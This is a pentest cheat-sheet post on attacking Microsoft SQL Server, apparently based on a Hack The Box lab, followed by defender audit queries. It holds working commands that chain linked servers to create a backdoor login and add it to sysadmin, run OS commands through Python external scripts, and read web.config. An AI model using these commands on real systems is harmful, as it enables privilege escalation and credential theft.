
MSSQL Pentest

Login via Linux

➜ mssqlclient.py <username>:<password>@<server>

Read this to upgrade the mssqlclient command shell.

MSSQL Basic Commands

# check version
SQL> select @@version;

# list logins
SQL> SELECT name FROM master..syslogins;

# list sysadmin logins
SQL> SELECT name FROM master..syslogins WHERE sysadmin = '1';

# check the current login's permissions
SQL> SELECT entity_name, permission_name FROM fn_my_permissions(NULL, 'SERVER');

# list databases
SQL> SELECT name FROM master..sysdatabases;

# list tables
SQL> SELECT * FROM <database>.INFORMATION_SCHEMA.TABLES;

# check the current database
SQL> SELECT DB_NAME();

# check the current user
SQL> select suser_name();

# check the current server name
SQL> select @@servername;

# list linked servers
SQL> select srvname from sysservers;

# execute a command on a linked server
SQL> EXECUTE ('select @@servername;') at [<srvname>];
SQL> EXECUTE ('select suser_name();') at [<srvname>];
SQL> EXECUTE ('SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''SERVER'');') at [COMPATIBILITY\POO_CONFIG];

# bounce back through a linked server
# from A to B and back to A again (note: each nesting level doubles the single quotes)
SQL> EXECUTE('EXECUTE(''select suser_name();'') at [COMPATIBILITY\POO_PUBLIC];') at [COMPATIBILITY\POO_CONFIG];
SQL> EXECUTE('EXECUTE (''SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''''SERVER'''');'') at [COMPATIBILITY\POO_PUBLIC];') at [COMPATIBILITY\POO_CONFIG];
SQL> EXECUTE('EXECUTE(''CREATE LOGIN nairpaa WITH PASSWORD = ''''P@ssword123!'''';'') at [COMPATIBILITY\POO_PUBLIC];') at [COMPATIBILITY\POO_CONFIG];
SQL> EXECUTE('EXECUTE(''sp_addsrvrolemember ''''nairpaa'''', ''''sysadmin'''';'') at [COMPATIBILITY\POO_PUBLIC];') at [COMPATIBILITY\POO_CONFIG];

# execute external scripts (Python and R) and read files with them
SQL> EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())'
SQL> EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))'
# open and read a file
SQL> EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())'
# multi-line script
SQL> EXECUTE sp_execute_external_script @language = N'Python', @script = N'
import sys
print(sys.version)
'
GO
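As an added defender-side check (example code written for this page, not part of the original post), the following T-SQL audits the three things the commands above depend on: how local logins are mapped onto each linked server, whether the external script runtime is switched on, and who already holds sysadmin. It assumes a login that is allowed to read the server-level catalog views on the instance being audited.

```sql
-- Added audit queries (not from the original post): inventory the linked-server
-- and external-script configuration that lets a low-privileged login reach
-- sysadmin on another instance, so a DBA can spot and tighten such chains.

-- 1. Linked servers and the login mapping used when crossing to them.
--    uses_self_credential = 0 with a remote_name means everyone covered by the
--    mapping arrives as that fixed remote login; local_principal_id = 0 is the
--    catch-all row that applies to every local login not listed explicitly.
SELECT  s.name                AS linked_server,
        s.data_source,
        s.is_rpc_out_enabled, -- EXECUTE (...) AT [server] requires RPC Out
        CASE
            WHEN ll.server_id IS NULL        THEN '<no login mapping>'
            WHEN ll.local_principal_id = 0   THEN '<all other local logins>'
            ELSE SUSER_NAME(ll.local_principal_id)
        END                   AS local_login,
        ll.uses_self_credential,
        ll.remote_name
FROM    sys.servers s
LEFT JOIN sys.linked_logins ll ON ll.server_id = s.server_id
WHERE   s.is_linked = 1
ORDER BY s.name, local_login;

-- 2. Is sp_execute_external_script usable at all on this instance?
--    value_in_use = 1 means Python/R scripts run with the Launchpad service.
SELECT  name, value_in_use
FROM    sys.configurations
WHERE   name = 'external scripts enabled';

-- 3. Current sysadmin members; compare against the expected list to catch a
--    login added through a bounce-back sp_addsrvrolemember call.
SELECT  sp.name, sp.type_desc
FROM    sys.server_role_members rm
JOIN    sys.server_principals r  ON r.principal_id  = rm.role_principal_id
JOIN    sys.server_principals sp ON sp.principal_id = rm.member_principal_id
WHERE   r.name = 'sysadmin'
ORDER BY sp.name;
```

Any catch-all mapping (local_principal_id = 0) whose remote_name is itself a sysadmin on the remote instance is the configuration that makes the bounce-back above possible; replacing it with per-login mappings or disabling RPC Out removes that path.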

References

  • https://0xdf.gitlab.io/2020/06/08/endgame-poo.html#huh
  • https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server
This post is licensed under CC BY 4.0 by the author.